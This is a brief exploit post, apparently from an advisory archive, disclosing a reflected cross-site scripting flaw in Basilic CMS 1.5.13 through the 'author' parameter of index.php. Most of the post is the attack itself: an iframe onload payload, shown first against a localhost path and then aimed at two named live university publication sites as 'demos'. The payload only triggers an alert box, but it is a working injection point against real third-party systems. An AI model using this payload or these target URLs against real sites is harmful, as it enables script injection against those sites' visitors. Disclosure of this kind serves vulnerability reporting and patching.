Basilic CMS version 1.5.13 suffers from a cross site scripting vulnerability.
254a3658255276292ca2b956782528205c26586c4061858e20d79b025418f52c
Basilic CMS Cross Site Scripting vlun
--------------------------------------------------------------------------
Software : Basilic version 1.5.13
Vendor : http://artis.imag.fr/Software/Basilic/
Download : http://artis.imag.fr/Software/Basilic/basilic-1.5.14.tar.gz
Author : Platen * mail: platen.secure[at]gmail.com
--------------------------------------------------------------------------
xss:
http://localhost/[path]/index.php?author=1<iframe/+/onload=alert(5555555)>
-----------
demo:
http://secure.ntsg.umt.edu/publications/index.php?author=1<iframe/+/onload=alert(5555555)>
http://www.iarc.uaf.edu/publications/index.php?author=1<iframe/+/onload=alert(5555555)>